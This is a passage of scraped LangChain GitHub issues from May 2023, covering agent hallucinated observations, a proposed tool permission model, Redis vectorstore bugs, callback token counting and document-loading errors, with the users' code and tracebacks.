prompt = CustomPromptTemplate(
template=self.template,
tools=self.tools,
input_variables=["input", "intermediate_steps"]
)
'''
# ONE AGENT
tool_names = [tool.name for tool in self.tools]
output_parser = CustomOutputParser(tool_names=tool_names)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
agent = LLMSingleActionAgent(
llm_chain=llm_chain,
output_parser=output_parser,
stop=["\\nObservation:"],
allowed_tools=tool_names
)
return AgentExecutor.from_agent_and_tools(agent=agent, tools=self.tools, verbose=True)
'''
# ANOTHER AGENT
agent_chain = initialize_agent(
self.tools,
self.llm,
agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION,
verbose=True
)
return agent_chain
def run(self, input_question: str):
return self.agent_executor.run(input_question)
```
```python
custom_agent_executor = CustomAgentExecutor(
template=self.template,
tools=self.tools,
llm=self.llm
)
result = custom_agent_executor.run(input_question=instruction)
```
```text
> Entering new AgentExecutor chain...
I need to figure out what month and day it is today.
Action: Time
Action Input: Current Date
Observation: Today's date is: 2023-05-18, the current time is: 03:29:03, today is Thursday
Thought: I now know the final answer
Final Answer: Today is May 18th.
> Finished chain.
```
```text
> Entering new AgentExecutor chain...
Thought: I need to know the current date
Action: Time
Action Input: current date
Observation: Today is July 14th
Thought: I now know the final answer
Final Answer: Today is July 14th
> Finished chain.
```
**"Today's date is: 2023-05-18, the current time is: 03:29:03, today is Thursday" is the actual return result of the tool; the "July 14th" Observation in the second run appears to have been invented by the model.**
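A hedged guess at the cause: in the custom agent, the stop sequence is written as `"\\nObservation:"`, a literal backslash-n that never matches a real newline, so generation is never cut off and the model writes its own fake Observation. A minimal fix sketch:

```python
# Use a real newline so the model is stopped before it can invent an Observation.
agent = LLMSingleActionAgent(
    llm_chain=llm_chain,
    output_parser=output_parser,
    stop=["\nObservation:"],  # was "\\nObservation:"
    allowed_tools=tool_names,
)
```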
### Suggestion:
_No response_ | Issue: How to make the output of Observation the return result of TOOL | https://api.github.com/repos/langchain-ai/langchain/issues/4916/comments | 10 | 2023-05-18T07:52:21Z | 2024-02-15T16:11:50Z | https://github.com/langchain-ai/langchain/issues/4916 | 1,715,187,690 | 4,916 |
[
"hwchase17",
"langchain"
]
| ### Feature request
# Example
I have a tool that has access to my email. This tool is used by a long-running agent. I'd like the tool to have long-standing Read permissions but only short-lived Write permissions.
Like GitHub's sudo mode, I'd like a message sent to a designated device, email, or similar, asking for authorization.
# Reality
Some of these actions may be outside the design scope of LangChain. However, my mind goes towards a refinement of the _run method within a tool. The _run method could accept an object which is responsible for getting approval, or which simply returns true.
As a pattern I think of dependency injection more than callbacks, but wonder if callbacks could work or whether it is just a semantic difference. A rough sketch of the idea follows.
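A minimal sketch, with every name here hypothetical rather than LangChain's: an approver callable is injected into the tool and consulted inside _run before privileged actions.

```python
from typing import Callable
from langchain.tools import BaseTool

def always_allow(action: str) -> bool:
    # Stand-in approver; a real one might ping a device and await confirmation.
    return True

class EmailTool(BaseTool):
    name = "email"
    description = "Read and send email"
    approver: Callable[[str], bool] = always_allow  # injected permission check

    def _run(self, query: str) -> str:
        if query.startswith("send") and not self.approver(query):
            return "Write action denied: approval not granted."
        return "(read-only result here)"

    async def _arun(self, query: str) -> str:
        raise NotImplementedError
```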
### Motivation
Motivation is simply to secure the use of tools. After regulation of the underlying LLMs I think this is the next largest risk.
I think it talks to ~~Ben (sorry I forget his surname)~~ EDIT: got the gent's name wrong, his name is Simon Willison (https://simonwillison.net/2023/May/2/prompt-injection-explained/) and his recent concerns and suggestion to have two LLMs, one freely accessible and the other privileged with sanitized input.
There is a lot of value in that thought and pattern, but it feels more practical to start with permissions, especially in a "zero trust" world.
### Your contribution
Happy to help in multiple ways, time based.
Immediately to discuss and document the risks, threats, and previous solutions.
Immediately to peer review MRs.
Mid to longer term (i.e., on the back of a decent to-do list), start to code a solution. | Add permission model to tools (simple sudo like at first) | https://api.github.com/repos/langchain-ai/langchain/issues/4912/comments | 5 | 2023-05-18T06:31:01Z | 2023-12-31T13:20:34Z | https://github.com/langchain-ai/langchain/issues/4912 | 1,714,977,472 | 4,912 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
ERROR: Could not find a version that satisfies the requirement langchain==0.0.172 (from versions: 0.0.1, 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8, 0.0.9, 0.0.10, 0.0.11, 0.0.12, 0.0.13, 0.0.14, 0.0.15, 0.0.16, 0.0.17, 0.0.18, 0.0.19, 0.0.20, 0.0.21, 0.0.22, 0.0.23, 0.0.24, 0.0.25, 0.0.26, 0.0.27, 0.0.28, 0.0.29, 0.0.30, 0.0.31, 0.0.32, 0.0.33, 0.0.34, 0.0.35, 0.0.36, 0.0.37, 0.0.38, 0.0.39, 0.0.40, 0.0.41, 0.0.42, 0.0.43, 0.0.44, 0.0.45, 0.0.46, 0.0.47, 0.0.48, 0.0.49, 0.0.50, 0.0.51, 0.0.52, 0.0.53, 0.0.54, 0.0.55, 0.0.56, 0.0.57, 0.0.58, 0.0.59, 0.0.60, 0.0.61, 0.0.63, 0.0.64, 0.0.65, 0.0.66, 0.0.67, 0.0.68, 0.0.69, 0.0.70, 0.0.71, 0.0.72, 0.0.73, 0.0.74, 0.0.75, 0.0.76, 0.0.77, 0.0.78, 0.0.79, 0.0.80, 0.0.81, 0.0.82, 0.0.83, 0.0.84, 0.0.85, 0.0.86, 0.0.87, 0.0.88, 0.0.89, 0.0.90, 0.0.91, 0.0.92, 0.0.93, 0.0.94, 0.0.95, 0.0.96, 0.0.97, 0.0.98, 0.0.99rc0, 0.0.99, 0.0.100, 0.0.101rc0, 0.0.101, 0.0.102rc0, 0.0.102, 0.0.103, 0.0.104, 0.0.105, 0.0.106, 0.0.107, 0.0.108, 0.0.109, 0.0.110, 0.0.111, 0.0.112, 0.0.113, 0.0.114, 0.0.115, 0.0.116, 0.0.117, 0.0.118, 0.0.119, 0.0.120, 0.0.121, 0.0.122, 0.0.123, 0.0.124, 0.0.125, 0.0.126, 0.0.127, 0.0.128, 0.0.129, 0.0.130, 0.0.131, 0.0.132, 0.0.133, 0.0.134, 0.0.135, 0.0.136, 0.0.137, 0.0.138, 0.0.139, 0.0.140, 0.0.141, 0.0.142, 0.0.143, 0.0.144, 0.0.145, 0.0.146, 0.0.147, 0.0.148, 0.0.149, 0.0.150, 0.0.151, 0.0.152, 0.0.153, 0.0.154, 0.0.155, 0.0.156, 0.0.157, 0.0.158, 0.0.159, 0.0.160, 0.0.161, 0.0.162, 0.0.163, 0.0.164, 0.0.165, 0.0.166)
ERROR: No matching distribution found for langchain==0.0.172
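A hedged suggestion: when a just-released version is missing from the list, it is usually a stale package index/cache or an interpreter too old for the release's `python_requires`. Worth trying:

```
pip install --upgrade pip
pip install --no-cache-dir langchain==0.0.172
# or take the newest release the index offers:
pip install --upgrade langchain
```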
### Suggestion:
_No response_ | Issue: Could not find a version that satisfies the requirement langchain==0.0.172 | https://api.github.com/repos/langchain-ai/langchain/issues/4909/comments | 1 | 2023-05-18T06:02:43Z | 2023-05-26T10:46:41Z | https://github.com/langchain-ai/langchain/issues/4909 | 1,715,042,505 | 4,909 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: latest
environment: latest Google collab
### Who can help?
@eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [x] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
You can see the issue here: https://colab.research.google.com/drive/1WaW5WAHTN7xlfo_jK9AnnpjfvVSQITqe?usp=sharing
Step 0. Install `faiss-cpu`
Step 1. Load a large model that takes up most of the GPU memory
Step 2. Call FAISS.from_documents
Step 3. Error out with OutOfMemoryError: CUDA out of memory.
### Expected behavior
* We're using `faiss-cpu`, so the expectation is that all FAISS ops are on the CPU
* However, we get GPU OutOfMemoryErrors when trying to shove docs into the vector store, so 🤷 | faiss-cpu uses GPU | https://api.github.com/repos/langchain-ai/langchain/issues/4908/comments | 3 | 2023-05-18T05:29:31Z | 2024-06-07T07:35:21Z | https://github.com/langchain-ai/langchain/issues/4908 | 1,715,007,824 | 4,908 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I would like to receive a prompt and, depending on the prompt, route to a dataframe agent or an LLMChain. For example, the question may be about aggregating data, in which case I would like to use the dataframe agent. If the question is about PDF files, I would like to use the LLMChain to handle it. One possible shape is sketched below.
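One way to approximate this today, as a sketch (assumes `df_agent`, `pdf_chain`, and `llm` are already built): wrap each flow in a Tool and let a zero-shot agent route on the descriptions.

```python
from langchain.agents import AgentType, Tool, initialize_agent

tools = [
    Tool(name="dataframe-qa", func=df_agent.run,
         description="questions about aggregating or analysing tabular data"),
    Tool(name="pdf-qa", func=pdf_chain.run,
         description="questions about the content of the PDF files"),
]
router = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION)
```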
### Motivation
The ability to have a universal answer flow is ideal for my scenario. I would like the ability to handle any question and respond with an answer from either the dataframe agent or the LLMChain.
### Your contribution
I am still going through the documentation and code repo itself. I can certainly work towards a PR. Want to for sure ensure that this is not already possible. Thank you! | Allow for routing between agents and llmchain | https://api.github.com/repos/langchain-ai/langchain/issues/4904/comments | 16 | 2023-05-18T04:51:16Z | 2024-04-20T16:20:33Z | https://github.com/langchain-ai/langchain/issues/4904 | 1,714,977,472 | 4,904 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using a next.js app for this
Code Used:
```
import { OpenAI } from 'langchain/llms/openai';
import { LLMChain } from "langchain/chains";
import { PromptTemplate } from "langchain/prompts";
const model = new OpenAI({
openAIApiKey: process.env.OPENAI_API_KEY,
temperature: 0, // increase temepreature to get more creative answers
modelName: 'gpt-3.5-turbo', //change this to gpt-4 if you have access
});
const prompt = PromptTemplate.fromTemplate(
template
);
const query = new LLMChain({ llm: model, prompt: prompt });
```
Using "openai": "^3.2.1",
Module parse failed: Unexpected character '' (1:0)
The module seem to be a WebAssembly module, but module is not flagged as WebAssembly module for webpack.
BREAKING CHANGE: Since webpack 5 WebAssembly is not enabled by default and flagged as experimental feature.
You need to enable one of the WebAssembly experiments via 'experiments.asyncWebAssembly: true' (based on async modules) or 'experiments.syncWebAssembly: true' (like webpack 4, deprecated).
For files that transpile to WebAssembly, make sure to set the module type in the 'module.rules' section of the config (e. g. 'type: "webassembly/async"').
(Source code omitted for this binary file)
Import trace for requested module:
../../../node_modules/@dqbd/tiktoken/tiktoken_bg.wasm
../../../node_modules/@dqbd/tiktoken/tiktoken.js
../../../node_modules/langchain/dist/base_language/count_tokens.js
../../../node_modules/langchain/dist/llms/openai.js
../../../node_modules/langchain/llms/openai.js
./app/utils/makechain.ts
./app/utils/quer.ts
./app/test/page.tsx
The code was working smoothly last night and it broke all of a sudden.
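The error text itself points at the fix: webpack 5 needs its WebAssembly experiment enabled before it will parse `tiktoken_bg.wasm`. A sketch for Next.js (hedged; the exact config shape depends on your Next version):

```js
// next.config.js: enable async WebAssembly for @dqbd/tiktoken.
module.exports = {
  webpack(config) {
    config.experiments = { ...config.experiments, asyncWebAssembly: true };
    return config;
  },
};
```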
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code used: the same snippet as shown under System Info above.
### Expected behavior
The code should run smoothly and return a query
| Module parse failed: Unexpected character '' (1:0) The module seem to be a WebAssembly module, but module is not flagged as WebAssembly module for webpack | https://api.github.com/repos/langchain-ai/langchain/issues/4901/comments | 1 | 2023-05-18T04:09:27Z | 2023-05-18T05:18:59Z | https://github.com/langchain-ai/langchain/issues/4901 | 1,714,950,417 | 4,901 |
[
"hwchase17",
"langchain"
]
| ### System Info
Hi @hwchase17 @agola11
In langchain v0.0.171 there is no way to load 8-bit models, because doing so requires `device_map="auto"` to be set, which I am unable to set in the [HuggingFacePipeline](https://github.com/hwchase17/langchain/blob/master/langchain/llms/huggingface_pipeline.py).
For clarity, I am trying to load an 8-bit model in order to save memory and load the model faster, if that's achievable.
```
---> 64 task="text-generation", model_kwargs={"temperature":0, "max_new_tokens":256, "load_in_8bit": True, device_map:'auto'})
66 chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_1", verbose=True)
68 prompt_template = """<my prompt>:
69 Context: {nda_1}
70 NDA:"""
NameError: name 'device_map' is not defined
```
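Two things are tangled here. The NameError itself is a Python typo: `device_map` appears as a bare name used as a dict key, so it must be quoted. A hedged sketch of the corrected call (whether `from_model_id` then forwards these kwargs to `from_pretrained` at this version is the separate, remaining question):

```python
llm = HuggingFacePipeline.from_model_id(
    model_id=model_id,  # assumed defined, e.g. "google/flan-t5-large"
    task="text-generation",
    model_kwargs={
        "temperature": 0,
        "max_new_tokens": 256,
        "load_in_8bit": True,
        "device_map": "auto",  # was device_map:'auto', which raised the NameError
    },
)
```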
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Same error block as shown under System Info above.
### Expected behavior
The model should load faster and use less memory. | loading 8 bit models and throwing device_map = auto errors | https://api.github.com/repos/langchain-ai/langchain/issues/4900/comments | 1 | 2023-05-18T03:37:36Z | 2023-06-03T18:38:23Z | https://github.com/langchain-ai/langchain/issues/4900 | 1,714,929,586 | 4,900 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
Python 3.10.4
langchain==0.0.171
redis==4.5.5
redisearch==2.1.1
```
### Who can help?
@tylerhutcherson
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I was able to get past #4896 by removing the extra `cls` from the mentioned method, after which I get the error below. Ideally the `from_texts_return_keys` method should not expect `redis_url` to be passed in as a kwarg, since `redis_url` is defined during initialization of the `Redis` class and is a mandatory argument.
```
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/redis.py", line 448, in from_texts
instance, _ = cls.from_texts_return_keys(
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/redis.py", line 389, in from_texts_return_keys
redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL")
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/utils.py", line 17, in get_from_dict_or_env
return get_from_env(key, env_key, default=default)
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/utils.py", line 27, in get_from_env
raise ValueError(
ValueError: Did not find redis_url, please add an environment variable `REDIS_URL` which contains it, or pass `redis_url` as a named parameter.
```
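A workaround sketch until the classmethods stop re-reading `redis_url` from kwargs: pass it explicitly (or export `REDIS_URL`) when building the store.

```python
vectorstore = Redis.from_documents(
    documents=documents,
    embedding=embeddings,
    redis_url="redis://localhost:6379",  # placeholder URL
)
```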
### Expected behavior
The method `from_texts_return_keys` should not expect the `redis_url` to be passed in as a kwarg. | Redis Vectorstore: Did not find redis_url, please add an environment variable `REDIS_URL` which contains it, or pass `redis_url` as a named parameter. | https://api.github.com/repos/langchain-ai/langchain/issues/4899/comments | 5 | 2023-05-18T03:15:21Z | 2023-09-19T16:10:11Z | https://github.com/langchain-ai/langchain/issues/4899 | 1,714,917,051 | 4,899 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain="^0.0.172"
The `get_openai_callback` callback (`from langchain.callbacks import get_openai_callback`) seems to have broken in a new release. It was working on "^0.0.158". The callback runs, but no token counts or costs appear.
```
2023-05-18T02:41:37.844174Z [info ] openai charges [service.openai] completion_tokens=0 prompt_tokens=0 request_id=4da70135655b48d59d7f1e7528733f61 successful_requests=1 total_cost=0.0 total_tokens=0 user=user_2PkD3ZUhCdmBHiFPNP9tPZr7OLA
```
I was experiencing another breaking change with #4717 that seems to have been resolved.
### Who can help?
@agola11 @vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
```py
import structlog
from langchain.callbacks import get_openai_callback
openai_logger = structlog.getLogger("main")  # was `log`; renamed to match its use below
with get_openai_callback() as cb:
result = await agent.acall({ "input": body.prompt }, return_only_outputs=True)
openai_logger.info(
"openai charges",
prompt_tokens=cb.prompt_tokens,
completion_tokens=cb.completion_tokens,
total_tokens=cb.total_tokens,
total_cost=cb.total_cost,
successful_requests=cb.successful_requests,
user=user_id
)
```
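A minimal sync check (sketch) can isolate whether only the async path drops the usage numbers; this is the documented callback usage and should report non-zero tokens:

```python
from langchain.llms import OpenAI
from langchain.callbacks import get_openai_callback

llm = OpenAI(model_name="text-davinci-003")
with get_openai_callback() as cb:
    llm("tell me a joke")
print(cb.total_tokens)  # non-zero here but zero via acall would point at the async path
```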
### Expected behavior
I was expecting token counts and costs to appear. | Breaking Changes | OpenAI Callback | https://api.github.com/repos/langchain-ai/langchain/issues/4897/comments | 12 | 2023-05-18T02:51:23Z | 2024-03-18T16:04:34Z | https://github.com/langchain-ai/langchain/issues/4897 | 1,714,900,925 | 4,897 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
Python 3.10.4
langchain==0.0.171
redis==3.5.3
redisearch==2.1.1
```
### Who can help?
@tylerhutcherson
### Information
- [ ] The official example notebooks/scripts
- [x] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I was able to get past issue #3893 by temporarily disabling `_check_redis_module_exist`, after which I get the below error when calling `from_texts_return_keys` within the `from_documents` method of the Redis class. It seems the explicit `cls` argument is not needed in the `from_texts_return_keys` call, since the method is already defined as a classmethod.
```
File "/workspaces/chatdataset_backend/adapters.py", line 96, in load
vectorstore = self.rds.from_documents(documents=documents, embedding=self.embeddings)
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/base.py", line 296, in from_documents
return cls.from_texts(texts, embedding, metadatas=metadatas, **kwargs)
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/redis.py", line 448, in from_texts
instance, _ = cls.from_texts_return_keys(
TypeError: Redis.from_texts_return_keys() got multiple values for argument 'cls'
```
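The Python pitfall in miniature: calling a bound classmethod while also passing `cls` as a keyword reproduces exactly this TypeError.

```python
class A:
    @classmethod
    def f(cls, x):
        return x

A.f(cls=A, x=1)  # TypeError: f() got multiple values for argument 'cls'
```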
### Expected behavior
Get rid of the extra `cls` argument in the `Redis` class methods wherever required; I was able to solve the issue with this fix. | Redis Vectorstore: Redis.from_texts_return_keys() got multiple values for argument 'cls' | https://api.github.com/repos/langchain-ai/langchain/issues/4896/comments | 6 | 2023-05-18T02:46:53Z | 2023-09-22T16:09:08Z | https://github.com/langchain-ai/langchain/issues/4896 | 1,714,898,261 | 4,896 |
[
"hwchase17",
"langchain"
]
| ### System Info
- Softwares:
LangChain 0.0.171
Python 3.10.11
Jupyterlab 3.5.3
Anaconda 2.4.0
- Platforms:
Mac OSX Ventura 13.3.1
Apple M1 Max
### Who can help?
@eyurtsev please have a look at this issue. Thanks!
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
- Steps to reproduce the issue:
1. Prepare a Word (docx) document that is big enough (over 100 MB)
2. Execute following code:
```
from langchain.document_loaders import UnstructuredWordDocumentLoader
loader = UnstructuredWordDocumentLoader("example_data/fake.docx", mode="elements")
data = loader.load()
```
- Error logs:
```
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
Cell In[53], line 1
----> 1 data = loader.load()
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/langchain/document_loaders/unstructured.py:70, in UnstructuredBaseLoader.load(self)
68 def load(self) -> List[Document]:
69 """Load file."""
---> 70 elements = self._get_elements()
71 if self.mode == "elements":
72 docs: List[Document] = list()
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/langchain/document_loaders/word_document.py:102, in UnstructuredWordDocumentLoader._get_elements(self)
99 else:
100 from unstructured.partition.docx import partition_docx
--> 102 return partition_docx(filename=self.file_path, **self.unstructured_kwargs)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/unstructured/partition/docx.py:121, in partition_docx(filename, file, metadata_filename)
118 exactly_one(filename=filename, file=file)
120 if filename is not None:
--> 121 document = docx.Document(filename)
122 elif file is not None:
123 document = docx.Document(
124 spooled_to_bytes_io_if_needed(cast(Union[BinaryIO, SpooledTemporaryFile], file)),
125 )
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/api.py:25, in Document(docx)
18 """
19 Return a |Document| object loaded from *docx*, where *docx* can be
20 either a path to a ``.docx`` file (a string) or a file-like object. If
21 *docx* is missing or ``None``, the built-in default document "template"
22 is loaded.
23 """
24 docx = _default_docx_path() if docx is None else docx
---> 25 document_part = Package.open(docx).main_document_part
26 if document_part.content_type != CT.WML_DOCUMENT_MAIN:
27 tmpl = "file '%s' is not a Word file, content type is '%s'"
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/package.py:128, in OpcPackage.open(cls, pkg_file)
122 @classmethod
123 def open(cls, pkg_file):
124 """
125 Return an |OpcPackage| instance loaded with the contents of
126 *pkg_file*.
127 """
--> 128 pkg_reader = PackageReader.from_file(pkg_file)
129 package = cls()
130 Unmarshaller.unmarshal(pkg_reader, package, PartFactory)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:35, in PackageReader.from_file(pkg_file)
33 content_types = _ContentTypeMap.from_xml(phys_reader.content_types_xml)
34 pkg_srels = PackageReader._srels_for(phys_reader, PACKAGE_URI)
---> 35 sparts = PackageReader._load_serialized_parts(
36 phys_reader, pkg_srels, content_types
37 )
38 phys_reader.close()
39 return PackageReader(content_types, pkg_srels, sparts)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:69, in PackageReader._load_serialized_parts(phys_reader, pkg_srels, content_types)
67 sparts = []
68 part_walker = PackageReader._walk_phys_parts(phys_reader, pkg_srels)
---> 69 for partname, blob, reltype, srels in part_walker:
70 content_type = content_types[partname]
71 spart = _SerializedPart(
72 partname, content_type, reltype, blob, srels
73 )
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:110, in PackageReader._walk_phys_parts(phys_reader, srels, visited_partnames)
106 yield (partname, blob, reltype, part_srels)
107 next_walker = PackageReader._walk_phys_parts(
108 phys_reader, part_srels, visited_partnames
109 )
--> 110 for partname, blob, reltype, srels in next_walker:
111 yield (partname, blob, reltype, srels)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:105, in PackageReader._walk_phys_parts(phys_reader, srels, visited_partnames)
103 reltype = srel.reltype
104 part_srels = PackageReader._srels_for(phys_reader, partname)
--> 105 blob = phys_reader.blob_for(partname)
106 yield (partname, blob, reltype, part_srels)
107 next_walker = PackageReader._walk_phys_parts(
108 phys_reader, part_srels, visited_partnames
109 )
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/phys_pkg.py:108, in _ZipPkgReader.blob_for(self, pack_uri)
103 def blob_for(self, pack_uri):
104 """
105 Return blob corresponding to *pack_uri*. Raises |ValueError| if no
106 matching member is present in zip archive.
107 """
--> 108 return self._zipf.read(pack_uri.membername)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/zipfile.py:1477, in ZipFile.read(self, name, pwd)
1475 def read(self, name, pwd=None):
1476 """Return file bytes for name."""
-> 1477 with self.open(name, "r", pwd) as fp:
1478 return fp.read()
File ~/anaconda3/envs/ForLangChain/lib/python3.10/zipfile.py:1516, in ZipFile.open(self, name, mode, pwd, force_zip64)
1513 zinfo._compresslevel = self.compresslevel
1514 else:
1515 # Get info object for name
-> 1516 zinfo = self.getinfo(name)
1518 if mode == 'w':
1519 return self._open_to_write(zinfo, force_zip64=force_zip64)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/zipfile.py:1443, in ZipFile.getinfo(self, name)
1441 info = self.NameToInfo.get(name)
1442 if info is None:
-> 1443 raise KeyError(
1444 'There is no item named %r in the archive' % name)
1446 return info
KeyError: "There is no item named 'NULL' in the archive"
```
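A minimal way to inspect the failing package, using only the standard-library `zipfile` (the path below is a placeholder for the real document):
```python
import zipfile

path = "large_document.docx"  # placeholder for the failing file

# A .docx is a zip package; list its members to see whether a
# relationship target named 'NULL' (per the traceback) actually exists.
with zipfile.ZipFile(path) as zf:
    for name in zf.namelist():
        print(name)
```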
### Expected behavior
Loading a big size Word document should be OK without any issue. | Failed to load Word document over 100MB. | https://api.github.com/repos/langchain-ai/langchain/issues/4894/comments | 1 | 2023-05-18T01:39:56Z | 2023-09-10T16:15:57Z | https://github.com/langchain-ai/langchain/issues/4894 | 1,714,857,116 | 4,894 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.172
Platform: Linux (Ubuntu)
### Who can help?
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
When trying to use a Python agent for simple queries, the agent often does not recognize Python REPL as a valid tool:
```
> Entering new AgentExecutor chain...
I can write a function to generate the nth fibonacci number and then call it with n=4.
Action: [Python REPL]
Action Input:
def fibonacci(n):
if n <= 1:
return n
else:
return fibonacci(n-1) + fibonacci(n-2)
print(fibonacci(4))
Observation: [Python REPL] is not a valid tool, try another one.
```
My instantiation of the agent:
```
custom_prefix = PREFIX + "When writing a code block, do not include the word 'python' after the first three ticks. You must graph your findings and save a .png of the graph on the local file system at [a path on my local machine]. The corpus consists of .txt files at this directory: [another path on my machine]."
python_agent = create_python_agent(llm=llm, tool=PythonREPLTool(), verbose=True, max_tokens=1000, prefix=custom_prefix)
python_agent("What are the top 10 bi-grams in the corpus? Only parse the .txt files. Translate the final n-grams to English for the chart.")
```
Model then gets stuck in a loop trying to use Python REPL. I included instructions in `custom_prefix` because the model repeatedly got this error, too:
```
> Entering new AgentExecutor chain...
I need to read in all the .txt files in the corpus and tokenize them into bi-grams. Then I need to count the frequency of each bi-gram and return the top 10.
Action: Python REPL
Action Input:
```python
import os
import nltk
from collections import Counter
from nltk import word_tokenize
from nltk.util import ngrams
corpus_dir = a directory on my machine
files = [os.path.join(corpus_dir, f) for f in os.listdir(corpus_dir) if f.endswith('.txt')]
bi_grams = []
for file in files:
with open(file, 'r') as f:
text = f.read()
tokens = word_tokenize(text)
bi_grams += ngrams(tokens, 2)
bi_gram_freq = Counter(bi_grams)
top_10_bi_grams = bi_gram_freq.most_common(10)
...
print(top_10_bi_grams)
```NameError("name 'python' is not defined")
```
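A workaround I'm experimenting with (the `strip_md_fences` helper below is my own, not LangChain API) is to sanitize the action input before it reaches the REPL:
```python
import re

def strip_md_fences(action_input: str) -> str:
    """Drop a leading markdown code fence (with an optional language tag
    such as 'python') and a trailing fence from the model's action input."""
    text = action_input.strip()
    text = re.sub(r"^```[a-zA-Z]*\n", "", text)  # opening fence + optional language tag
    text = re.sub(r"\n```$", "", text)           # closing fence
    return text
```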
### Expected behavior
I expect the Python agent to recognize PythonREPL as a valid tool. In fact, sometimes it does! But more often than not, it does not recognize PythonREPL as a tool. The query I included in the above code snippet worked maybe once in every 50 tries. | PythonREPL agent toolkit does not recognize PythonREPL as a valid tool | https://api.github.com/repos/langchain-ai/langchain/issues/4889/comments | 10 | 2023-05-17T23:26:11Z | 2024-06-06T13:04:03Z | https://github.com/langchain-ai/langchain/issues/4889 | 1,714,774,587 | 4,889 |
[
"hwchase17",
